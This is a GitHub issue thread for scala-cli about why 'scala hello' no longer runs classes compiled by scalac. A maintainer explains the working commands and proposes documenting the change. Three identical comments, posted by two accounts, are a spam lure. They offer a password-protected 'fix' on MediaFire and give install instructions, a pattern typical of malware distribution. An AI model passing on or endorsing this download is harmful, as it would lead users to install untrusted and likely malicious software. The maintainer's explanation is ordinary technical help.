### ISSUE TITLE
Document starting programs compiled by scalac in the current working directory

### ISSUE THREAD

**Issue by tgodzik** [VirtusLab/scala-cli#3132]
**Version(s)**
1.5.0 follow up from https://github.com/scala/scala3/issues/21432

**Describe the bug**
If a user compiles using scalac, they can't now run that using scala.

**To Reproduce**
```
› scalac hello.scala
› ls -la hello.*
-rw-r--r--@ 1 kieran  staff  758 25 Aug 20:45 hello$package$.class
-rw-r--r--@ 1 kieran  staff  267 25 Aug 20:45 hello$package.class
-rw-r--r--@ 1 kieran  staff  593 25 Aug 20:45 hello$package.tasty
-rw-r--r--@ 1 kieran  staff  912 25 Aug 20:45 hello.class
-rw-r--r--@ 1 kieran  staff   45 25 Aug 20:45 hello.scala
-rw-r--r--@ 1 kieran  staff  502 25 Aug 20:45 hello.tasty
› scala hello
[error]  hello is not a scala sub-command and it is not a valid path to an input file or directory.
Try viewing the relevant help to see the list of available sub-commands and options.
  scala --help
```

**Expected behaviour**
Hello should be run. Should we see if `hello.class` exists in that case and just try to run it? I am not sure if we discussed this breaking (?) change

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gedochao** [comment]
It has been discussed and agreed we would not be supporting this during SIP-46 implementation (this has been a while ago, I'd have to look very deep to link to a discussion).
Scala CLI never tries to include any inputs from the current working directory, nor should it.

The equivalent for this to be working is:
```bash
scalac hello.scala
scala run -cp .
```
Passing the main class may be necessary, in which case:
```bash
scalac hello.scala
scala run -cp . -M hello
```
it is necessary to pass the `run` command explicitly, as otherwise it is assumed we are launching the REPL (there are no explicit inputs, just a classpath).
We treat passing the current working directory to the classpath as necessary here.

What we should do here is add an entry about it in the migration guide (https://scala-cli.virtuslab.org/docs/guides/introduction/old-runner-migration/), as it indeed seems largely undocumented.

Please note that passing the main class to the old `scala` script this way is also entirely undocumented, it's very easy to miss documenting these things when they weren't documented in the first place...
